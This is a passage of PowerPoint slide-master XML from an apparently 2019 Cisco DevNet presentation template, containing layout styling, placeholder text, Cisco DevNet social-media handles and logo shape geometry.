              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="4267">
                <a:solidFill>
                  <a:srgbClr val="676767"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Connect with Us and share Your Story…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="897025" y="3462750"/>
            <a:ext cx="3351389" cy="1151980"/>
            <a:chOff x="1196034" y="4810961"/>
            <a:chExt cx="4468518" cy="1535973"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Text Placeholder 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAAAC206-9A88-3D48-959A-E87754796B68}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1528602" y="4810961"/>
              <a:ext cx="4135950" cy="1418214"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lst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2862" indent="0">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="450"/>
                </a:spcBef>
                <a:buFont typeface="Arial" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1500" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="0D3A5C"/>
                  </a:solidFill>
                  <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                  <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>@</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1500" b="0" i="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="0D3A5C"/>
                  </a:solidFill>
                  <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                  <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>CiscoDevNet</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1500" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="0D3A5C"/>
                  </a:solidFill>
                  <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                  <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>  </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="42862" indent="0">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="450"/>
                </a:spcBef>
                <a:buFont typeface="Arial" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1500" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="0D3A5C"/>
                  </a:solidFill>
                  <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                  <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>#</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1500" b="0" i="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="0D3A5C"/>
                  </a:solidFill>
                  <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                  <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>DevNetExpress</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1500" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D3A5C"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="42862" indent="0">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="450"/>
                </a:spcBef>
                <a:buFont typeface="Arial" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1500" b="0" i="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="0D3A5C"/>
                  </a:solidFill>
                  <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                  <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>facebook.com</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1500" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="0D3A5C"/>
                  </a:solidFill>
                  <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                  <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1500" b="0" i="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="0D3A5C"/>
                  </a:solidFill>
                  <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                  <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>ciscodevnet</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1500" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="0D3A5C"/>
                  </a:solidFill>
                  <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                  <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>/ </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="42862" indent="0">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="450"/>
                </a:spcBef>
                <a:buFont typeface="Arial" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1500" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="0D3A5C"/>
                  </a:solidFill>
                  <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                  <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>http://github.com/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1500" b="0" i="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="0D3A5C"/>
                  </a:solidFill>
                  <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                  <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>CiscoDevNet</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1500" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="0D3A5C"/>
                  </a:solidFill>
                  <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                  <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="Picture 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95779378-9FE7-1E41-B181-1DD9A65E538F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr userDrawn="1"/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"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229910" y="5242933"/>
              <a:ext cx="298692" cy="298692"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="12" name="Picture 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{182696BE-37C8-7D49-9753-E9C01221B127}"/>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96034" y="5981159"/>
              <a:ext cx="349467" cy="365775"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13" name="Picture 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28E69E19-8E61-3A49-9770-F85A9B2CF43B}"/>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266486" y="5668092"/>
              <a:ext cx="233068" cy="233068"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="17" name="Picture 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95779378-9FE7-1E41-B181-1DD9A65E538F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr userDrawn="1"/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"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251645" y="4882337"/>
              <a:ext cx="298692" cy="298692"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38457373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5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11FA1C9D-BAAC-7540-AA74-B04ED364A132}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>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a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2821054" y="1060327"/>
            <a:ext cx="3501892" cy="2534777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7635713-6CF6-4743-9F0B-3B95D9CD4448}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1316422" y="3671464"/>
            <a:ext cx="6885218" cy="553998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D3A5C"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT Heavy" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT Heavy" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D3A5C"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT Heavy" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT Heavy" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CiscoDevNet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D3A5C"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT Heavy" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT Heavy" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D3A5C"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D3A5C"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT Heavy" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT Heavy" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D3A5C"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT Heavy" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT Heavy" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DevNetExpress</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" b="1" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0D3A5C"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT Heavy" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              <a:cs typeface="CiscoSansTT Heavy" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25661416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userDrawn="1">
  <p:cSld name="1_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dirty="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2682E39F-58A8-3847-BD18-46182BBB5B2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix amt="67000"/>
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId3"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8409541" y="4665276"/>
            <a:ext cx="591540" cy="304018"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="119321230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34B1C16-5163-4B41-BEEC-B89370F8557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286"/>
            <a:ext cx="9144000" cy="5140930"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="403532654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45200" y="192024"/>
            <a:ext cx="8257032"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defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT Light" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AED59B0F-C472-469F-8983-6C5A6F04ED5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="black">
          <a:xfrm>
            <a:off x="5849925" y="4946906"/>
            <a:ext cx="2544460" cy="154518"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="61586" tIns="30792" rIns="61586" bIns="30792" anchor="b">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="r" defTabSz="610729"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 2019  Cisco and/or its affiliates. All rights reserved.   Cisco Public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B810A9CF-C747-2B40-A1E3-3B19743F3386}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4314558" y="4909950"/>
            <a:ext cx="514886" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="b">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="457189"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CiscoSansTT Light" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSansTT Light" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>#CLUS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8370151" y="4880893"/>
            <a:ext cx="359666" cy="274637"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr lang="en-US" sz="600" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT Light" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="CiscoSans Thin"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{96A97DD0-5BE7-4856-A2A9-C42C6688E607}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Freeform 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1CF8571-1D0E-4150-86CE-170EBEE47846}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="536418" y="4785455"/>
            <a:ext cx="822960" cy="276700"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 3628 w 4066"/>
              <a:gd name="T1" fmla="*/ 826 h 1365"/>
              <a:gd name="T2" fmla="*/ 3718 w 4066"/>
              <a:gd name="T3" fmla="*/ 964 h 1365"/>
              <a:gd name="T4" fmla="*/ 3811 w 4066"/>
              <a:gd name="T5" fmla="*/ 668 h 1365"/>
              <a:gd name="T6" fmla="*/ 4065 w 4066"/>
              <a:gd name="T7" fmla="*/ 98 h 1365"/>
              <a:gd name="T8" fmla="*/ 4000 w 4066"/>
              <a:gd name="T9" fmla="*/ 17 h 1365"/>
              <a:gd name="T10" fmla="*/ 3679 w 4066"/>
              <a:gd name="T11" fmla="*/ 626 h 1365"/>
              <a:gd name="T12" fmla="*/ 3554 w 4066"/>
              <a:gd name="T13" fmla="*/ 1359 h 1365"/>
              <a:gd name="T14" fmla="*/ 3659 w 4066"/>
              <a:gd name="T15" fmla="*/ 1062 h 1365"/>
              <a:gd name="T16" fmla="*/ 3507 w 4066"/>
              <a:gd name="T17" fmla="*/ 1308 h 1365"/>
              <a:gd name="T18" fmla="*/ 1989 w 4066"/>
              <a:gd name="T19" fmla="*/ 1161 h 1365"/>
              <a:gd name="T20" fmla="*/ 2169 w 4066"/>
              <a:gd name="T21" fmla="*/ 203 h 1365"/>
              <a:gd name="T22" fmla="*/ 2189 w 4066"/>
              <a:gd name="T23" fmla="*/ 155 h 1365"/>
              <a:gd name="T24" fmla="*/ 2169 w 4066"/>
              <a:gd name="T25" fmla="*/ 747 h 1365"/>
              <a:gd name="T26" fmla="*/ 2183 w 4066"/>
              <a:gd name="T27" fmla="*/ 1359 h 1365"/>
              <a:gd name="T28" fmla="*/ 2465 w 4066"/>
              <a:gd name="T29" fmla="*/ 550 h 1365"/>
              <a:gd name="T30" fmla="*/ 2491 w 4066"/>
              <a:gd name="T31" fmla="*/ 389 h 1365"/>
              <a:gd name="T32" fmla="*/ 2392 w 4066"/>
              <a:gd name="T33" fmla="*/ 1283 h 1365"/>
              <a:gd name="T34" fmla="*/ 2395 w 4066"/>
              <a:gd name="T35" fmla="*/ 989 h 1365"/>
              <a:gd name="T36" fmla="*/ 2361 w 4066"/>
              <a:gd name="T37" fmla="*/ 612 h 1365"/>
              <a:gd name="T38" fmla="*/ 2268 w 4066"/>
              <a:gd name="T39" fmla="*/ 1300 h 1365"/>
              <a:gd name="T40" fmla="*/ 3092 w 4066"/>
              <a:gd name="T41" fmla="*/ 778 h 1365"/>
              <a:gd name="T42" fmla="*/ 3001 w 4066"/>
              <a:gd name="T43" fmla="*/ 907 h 1365"/>
              <a:gd name="T44" fmla="*/ 2784 w 4066"/>
              <a:gd name="T45" fmla="*/ 1356 h 1365"/>
              <a:gd name="T46" fmla="*/ 2654 w 4066"/>
              <a:gd name="T47" fmla="*/ 1311 h 1365"/>
              <a:gd name="T48" fmla="*/ 2553 w 4066"/>
              <a:gd name="T49" fmla="*/ 694 h 1365"/>
              <a:gd name="T50" fmla="*/ 2770 w 4066"/>
              <a:gd name="T51" fmla="*/ 762 h 1365"/>
              <a:gd name="T52" fmla="*/ 2770 w 4066"/>
              <a:gd name="T53" fmla="*/ 818 h 1365"/>
              <a:gd name="T54" fmla="*/ 2778 w 4066"/>
              <a:gd name="T55" fmla="*/ 1088 h 1365"/>
              <a:gd name="T56" fmla="*/ 2815 w 4066"/>
              <a:gd name="T57" fmla="*/ 1094 h 1365"/>
              <a:gd name="T58" fmla="*/ 3151 w 4066"/>
              <a:gd name="T59" fmla="*/ 508 h 1365"/>
              <a:gd name="T60" fmla="*/ 3092 w 4066"/>
              <a:gd name="T61" fmla="*/ 778 h 1365"/>
              <a:gd name="T62" fmla="*/ 3227 w 4066"/>
              <a:gd name="T63" fmla="*/ 739 h 1365"/>
              <a:gd name="T64" fmla="*/ 3165 w 4066"/>
              <a:gd name="T65" fmla="*/ 843 h 1365"/>
              <a:gd name="T66" fmla="*/ 3123 w 4066"/>
              <a:gd name="T67" fmla="*/ 1277 h 1365"/>
              <a:gd name="T68" fmla="*/ 3346 w 4066"/>
              <a:gd name="T69" fmla="*/ 1291 h 1365"/>
              <a:gd name="T70" fmla="*/ 3439 w 4066"/>
              <a:gd name="T71" fmla="*/ 1108 h 1365"/>
              <a:gd name="T72" fmla="*/ 3213 w 4066"/>
              <a:gd name="T73" fmla="*/ 1271 h 1365"/>
              <a:gd name="T74" fmla="*/ 3405 w 4066"/>
              <a:gd name="T75" fmla="*/ 876 h 1365"/>
              <a:gd name="T76" fmla="*/ 3566 w 4066"/>
              <a:gd name="T77" fmla="*/ 685 h 1365"/>
              <a:gd name="T78" fmla="*/ 3478 w 4066"/>
              <a:gd name="T79" fmla="*/ 708 h 1365"/>
              <a:gd name="T80" fmla="*/ 3380 w 4066"/>
              <a:gd name="T81" fmla="*/ 843 h 1365"/>
              <a:gd name="T82" fmla="*/ 3478 w 4066"/>
              <a:gd name="T83" fmla="*/ 708 h 1365"/>
              <a:gd name="T84" fmla="*/ 116 w 4066"/>
              <a:gd name="T85" fmla="*/ 1088 h 1365"/>
              <a:gd name="T86" fmla="*/ 480 w 4066"/>
              <a:gd name="T87" fmla="*/ 1003 h 1365"/>
              <a:gd name="T88" fmla="*/ 257 w 4066"/>
              <a:gd name="T89" fmla="*/ 1359 h 1365"/>
              <a:gd name="T90" fmla="*/ 646 w 4066"/>
              <a:gd name="T91" fmla="*/ 826 h 1365"/>
              <a:gd name="T92" fmla="*/ 649 w 4066"/>
              <a:gd name="T93" fmla="*/ 919 h 1365"/>
              <a:gd name="T94" fmla="*/ 646 w 4066"/>
